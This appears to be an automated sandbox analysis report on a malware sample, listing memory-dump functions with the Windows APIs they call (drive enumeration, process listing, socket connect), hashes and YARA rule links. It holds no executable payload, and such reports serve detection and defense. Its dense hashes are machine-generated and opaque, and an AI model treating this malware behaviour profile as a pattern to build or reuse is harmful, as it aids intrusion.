                                    • Opcode Fuzzy Hash: 2e47141f8f16f5d3cf3693cf86fa2049507a7711d19fd0d7c7e070e978afd588
                                    • Instruction Fuzzy Hash: 2151C5EB26D231BEB202C1956B14AFB6BAED5C7730771C827F407C6552D2980EAB7035
                                    Function 07420324 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 300COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 406e1da141d0c7345517ba568b2b26c64ef49072666ac8e0ac97b51ed6ea8346
                                    • Instruction ID: 9c59a5be552492b5b03ba1d63da88590ab9ba30c9a698bca50530173562ca170
                                    • Opcode Fuzzy Hash: 406e1da141d0c7345517ba568b2b26c64ef49072666ac8e0ac97b51ed6ea8346
                                    • Instruction Fuzzy Hash: C251B4EB26C131BE7102C1956B54AFB6BAEE5C77307B1C827F407D6521E2980EAB7035
                                    Function 074202E1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 293COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b0ba3f8d1cafbe4de73e8ae71f25a3209682566b0aebce00c8c75438ac8cd90c
                                    • Instruction ID: a24b9e9232f500bbba9a0927480c2431a2d42a743c2f5020cbfa1b77135494d2
                                    • Opcode Fuzzy Hash: b0ba3f8d1cafbe4de73e8ae71f25a3209682566b0aebce00c8c75438ac8cd90c
                                    • Instruction Fuzzy Hash: 1751B5EB26D131BE7102C1956B14AFB67AEE5C7730771C82BF407C5511E2980E6B7035
                                    Function 074202FE Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 292COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b0e52dc4444c7190100be9d6ba5e549a602c8644f5d420dec1c59dc3acee0c13
                                    • Instruction ID: 822b2ff64255695720df575d1d7581fcfc5cee87c2a7eba78ca2029befb65991
                                    • Opcode Fuzzy Hash: b0e52dc4444c7190100be9d6ba5e549a602c8644f5d420dec1c59dc3acee0c13
                                    • Instruction Fuzzy Hash: 1E5193EB26D231BE7102C1952B14AFB57AEE5C7730771C827F407C6521E2980EAB7035
                                    Function 0742035E Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 291COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 01b10fa3c96e4fe10c6b57b70c12dc387327a3e8490ba30893c814b4e809cc16
                                    • Instruction ID: 3705589fb709939cb82e32b2c52fc6ef37baa415afdfdc72c0c4d0319521fd7f
                                    • Opcode Fuzzy Hash: 01b10fa3c96e4fe10c6b57b70c12dc387327a3e8490ba30893c814b4e809cc16
                                    • Instruction Fuzzy Hash: 6F51D5EB26C231BE7202C5916B14AFA5BEEE5C7730771C827F407C5512E2980E6B7135
                                    Function 0742033F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 275COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: f727e47ef8959313026755dfdc4667264b0fff0084c523184723dfc43731c06a
                                    • Instruction ID: 771525a21bdb1b9c784034bec77b8cf72c809d10adab0ba1328ea92d6f728bf0
                                    • Opcode Fuzzy Hash: f727e47ef8959313026755dfdc4667264b0fff0084c523184723dfc43731c06a
                                    • Instruction Fuzzy Hash: A951A2EB26C231BEB102C5912B14AFB57EEE5C77307B1C827F407C6511E2980EAB6135
                                    Function 07420383 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: e14e093648afc721ae58d465794f1ff1bbad9ce0a68162956f0c6018c29969e2
                                    • Instruction ID: 764acfe995cf7e9d564829b38e9692f1b01e2ad3dda4267480bc17507394d9fe
                                    • Opcode Fuzzy Hash: e14e093648afc721ae58d465794f1ff1bbad9ce0a68162956f0c6018c29969e2
                                    • Instruction Fuzzy Hash: 184190EB26D231BD7102C1912B14AFA57AEE5C7730771C837F807C6512E2984EAB7135
                                    Function 074203A2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 4e89b37384848a769a3e73a1ffa27a387d3c93469b4e2757c934402f79c5003f
                                    • Instruction ID: 401d78fb4823a608716c9f5611fa15d0a0afb9c60039ea2fb82b298fa57c8091
                                    • Opcode Fuzzy Hash: 4e89b37384848a769a3e73a1ffa27a387d3c93469b4e2757c934402f79c5003f
                                    • Instruction Fuzzy Hash: A241A1EB26C231BD7142C1956B14AFA57AEE5C7730B71C82BF807C5512E2980EAF7135
                                    Function 074203BB Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 248f61aa2fe2bd41373e85b5f3d95d7731c26c9b339f88b13c3dfc48d739f97c
                                    • Instruction ID: 75d213116431787af923dd19cfa400c00904d5de9fb218379b0dd7a307433ccc
                                    • Opcode Fuzzy Hash: 248f61aa2fe2bd41373e85b5f3d95d7731c26c9b339f88b13c3dfc48d739f97c
                                    • Instruction Fuzzy Hash: 16419FEB26C231BD7242C1952B14AFB67AEE5C77307B1C827F807C6511E2984EAB7035
                                    Function 074203C4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: ca71e6b7e9bd86e20c7a34c51d8f5b108b10feccb3fd4b8ba2d9f7382701ede5
                                    • Instruction ID: 0c570cc5865bfdcfe66474dfb0d76f29ecdf112b72f558ea383813dd74a99751
                                    • Opcode Fuzzy Hash: ca71e6b7e9bd86e20c7a34c51d8f5b108b10feccb3fd4b8ba2d9f7382701ede5
                                    • Instruction Fuzzy Hash: BD41C1EB26C231BD7142C1912B14AFB67AEE5C77307B1C827F807C6512E2980EAB7135
                                    Function 07420465 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: d5627fea452be03344b7c43ff9278a6725e806ae17b0b41559b45d9546aebc29
                                    • Instruction ID: 64271618c0f807ad65c6479f60bfbdd378c0afd030dc4029f5ccb6ad52e332fe
                                    • Opcode Fuzzy Hash: d5627fea452be03344b7c43ff9278a6725e806ae17b0b41559b45d9546aebc29
                                    • Instruction Fuzzy Hash: ED41D5EB26C231BDB242C1856B10AFB5BEEE5C77307B1C827F402C5551E2940EAB7135
                                    Function 074203F8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 21c2357fef0c2b53bf028f1d584f14d6873ab59798c9d89c1107c4900745987f
                                    • Instruction ID: 2807f715d757f2f5364623a269ca63e743c02d4f472e592eb512fe4d65c9f41a
                                    • Opcode Fuzzy Hash: 21c2357fef0c2b53bf028f1d584f14d6873ab59798c9d89c1107c4900745987f
                                    • Instruction Fuzzy Hash: A941E5EB26C231BDB202C1956B10AFA5BEEE5C7730771C827F807C6552E2944EAB6135
                                    Function 006778B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: FD %s:%d sclose(%d)
                                    • API String ID: 2781271927-3116021458
                                    • Opcode ID: 1eec6daa7115310aaca65efccabf13ffd30a2b59c72cc829c92016f7e2a6cf3a
                                    • Instruction ID: be19fabbbe166c934d16306f2307ae8d17919d5e2a2272aadf631959f3a87c2f
                                    • Opcode Fuzzy Hash: 1eec6daa7115310aaca65efccabf13ffd30a2b59c72cc829c92016f7e2a6cf3a
                                    • Instruction Fuzzy Hash: 9BD05E3290A2316B85206599AC49C9F7AA99EC6F60B16486DF85477201D2209C0187E3
                                    Function 0073B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0073B29E,?,00000000,?,?), ref: 0073B0BA
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00723C41,00000000), ref: 0073B0C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnect
                                    • String ID:
                                    • API String ID: 374722065-0
                                    • Opcode ID: 2a4adfad1204e46ce4c0c004dad473bf7c57101321550bce5724c1305057f04c
                                    • Instruction ID: 7daa9f88bea77c66c1fe4f993e3fe4154ba43a6c55424d07f9d96291ddf23856
                                    • Opcode Fuzzy Hash: 2a4adfad1204e46ce4c0c004dad473bf7c57101321550bce5724c1305057f04c
                                    • Instruction Fuzzy Hash: E701D8363043009BEA245A68DD84F6BB399FF89364F040B64FA78971D2D72AED508761
                                    Function 074505D8 Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e54072e9477a000ae31bda638aaee6f70dbc46352a32b5f366317dd489d859bf
                                    • Instruction ID: 314331671400e8077b1b54f8d56ce85fef747dd21b53e9cdc699ba3e1794ccf9
                                    • Opcode Fuzzy Hash: e54072e9477a000ae31bda638aaee6f70dbc46352a32b5f366317dd489d859bf
                                    • Instruction Fuzzy Hash: C0518DEF29C111BDB20281612B64AFB676EE6D3330B30883BFC07C6563E6D94A4B5471
                                    Function 0745064C Relevance: 1.8, APIs: 1, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e770e8aa187d750f5d31e7d686e228d3fedfaca955dc221aa08bb0f4bfc2dac
                                    • Instruction ID: c83c8957f4c67720df2e8b6686c50ad904cbf7c5863c88543c782bd54f084363
                                    • Opcode Fuzzy Hash: 6e770e8aa187d750f5d31e7d686e228d3fedfaca955dc221aa08bb0f4bfc2dac
                                    • Instruction Fuzzy Hash: 22515BEF25C111BDB20281616B64AFB5B6EE6D3730B30882BFC07D6563E2D84A4B5571
                                    Function 074505CD Relevance: 1.8, APIs: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 2f877036171a1bf6b16c24f3fe4b39af3897b55170d39a0943d7855e706e0eee
                                    • Instruction ID: a08e837bf0e75e8b24630ec4b3ff7fe1e02fc5b66f7da98f7b1a36e11fa58f87
                                    • Opcode Fuzzy Hash: 2f877036171a1bf6b16c24f3fe4b39af3897b55170d39a0943d7855e706e0eee
                                    • Instruction Fuzzy Hash: 91415CEF25C111BDB20291612B64AFB676EE6D7730B30883BFC07D6563E2D84A4B5471
                                    Function 074505CB Relevance: 1.8, APIs: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 207b9380b2466e5daa13e3704e767166dc68db9def35c636384da650607de129
                                    • Instruction ID: d5507c9fea092bed52748a34cdeec7bab52018db352640d91da359067051ab23
                                    • Opcode Fuzzy Hash: 207b9380b2466e5daa13e3704e767166dc68db9def35c636384da650607de129
                                    • Instruction Fuzzy Hash: 84415CEF26C111BDB20291612B64AFB676EE6D7730B30882BFC07D6563E2D84A4F5471
                                    Function 07450666 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 95a7bb04404facce849aa243a99f5335d882bc01a561ea13cb95408fd4809209
                                    • Instruction ID: c7c60e6f15c3d43984310d4dbbb52a4c0dbb41111384b293a8e5b5797dcc7610
                                    • Opcode Fuzzy Hash: 95a7bb04404facce849aa243a99f5335d882bc01a561ea13cb95408fd4809209
                                    • Instruction Fuzzy Hash: F3412DEF29C111BDB10291612B64AFB576EE6D3730B30882BFC07D6563E2D84A4F5571
                                    Function 074505F2 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 5147e09911d195e6332eeee7cff178e96e1dd42e764ec2558bff85c25c892bca
                                    • Instruction ID: e3e3786ed2b310dfaf7ce149bc2a6a786811c8bd036489fac618c2238afb258c
                                    • Opcode Fuzzy Hash: 5147e09911d195e6332eeee7cff178e96e1dd42e764ec2558bff85c25c892bca
                                    • Instruction Fuzzy Hash: 7D4139EF25C121BDB20291612B64AFB676EE6D7730B30882BFC07D6563E2D84A4F5471
                                    Function 07450698 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b21457574e1756acdcc2399ec239b5e4c899bf39029007781dde40326e6f1dc5
                                    • Instruction ID: b33f14c5ce8badc1beb04c3be84347f11ef59a9502ef1c453e21540322b4f867
                                    • Opcode Fuzzy Hash: b21457574e1756acdcc2399ec239b5e4c899bf39029007781dde40326e6f1dc5
                                    • Instruction Fuzzy Hash: 9C4161EF29C1117DB20291612B64AFB6B6EE6D7730B34882BFC07C6563E2C84A4F5571
                                    Function 0745061E Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: aa2b9cbee6b7d0712283a507272a4f3b488f19e2176af1ff843ba5cd0e48b927
                                    • Instruction ID: a7054758914608a3b95639c94409763fba3a29ae91c9dda445966d694f8e6288
                                    • Opcode Fuzzy Hash: aa2b9cbee6b7d0712283a507272a4f3b488f19e2176af1ff843ba5cd0e48b927
                                    • Instruction Fuzzy Hash: 1F416AEF25C121BDB20281616B64AFB676EE6D3730B30882BFC07D6563E2D84A4B5571
                                    Function 07460143 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: efc2b609b51031c3c6f5606925eb15ae1d6196823b80924270ef7ad2db590373
                                    • Instruction ID: a02464f5969aa0a99b0df584a6e790bbbab690249d3c3cd8aeddb394af759ca0
                                    • Opcode Fuzzy Hash: efc2b609b51031c3c6f5606925eb15ae1d6196823b80924270ef7ad2db590373
                                    • Instruction Fuzzy Hash: 464107E759C221BEA21290551B5CEFB6B6FE9D3730B308827B803D7562E3954E8B5033
                                    Function 074506BE Relevance: 1.7, APIs: 1, Instructions: 213COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 00f228e016f09155dabffd5d52acc2ff2d65dfc163b2466d2a0892ef68f83770
                                    • Instruction ID: 89770d39730543380f1c7f0efb8cb561ded8ab8736ba46d40dade72575b2e7fa
                                    • Opcode Fuzzy Hash: 00f228e016f09155dabffd5d52acc2ff2d65dfc163b2466d2a0892ef68f83770
                                    • Instruction Fuzzy Hash: CF417CEF65C1117DB20291622F64EFA676EE6D3330B34883BF806D6563E2884A4F5571
                                    Function 07450700 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 03c23fd79e6befde707257ddae088f9f720f5bce40bd4b212bb26e9009cd84b5
                                    • Instruction ID: 84bf03618e0efdfe83aba58b957269ec4e51c28074226bef460490a92220b72c
                                    • Opcode Fuzzy Hash: 03c23fd79e6befde707257ddae088f9f720f5bce40bd4b212bb26e9009cd84b5
                                    • Instruction Fuzzy Hash: B031F3EF2581117DB20291622F68EFA676EE6D3730B34883BFC06D6563E6884A4F5471
                                    Function 07450724 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 2416ce49e16dd51e4183b8f6e8ee59818a95b11d83543df8c90f085833480100
                                    • Instruction ID: 2c3a6dd50b5fcb72284244eddc28fca73f95060a8605d354b963ba9d65db0494
                                    • Opcode Fuzzy Hash: 2416ce49e16dd51e4183b8f6e8ee59818a95b11d83543df8c90f085833480100
                                    • Instruction Fuzzy Hash: 2331E2EF29C1117DB10291622F64EFAA76EE6D3730B34883BF806D6567E2884A4F1471
                                    Function 07450738 Relevance: 1.7, APIs: 1, Instructions: 181COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
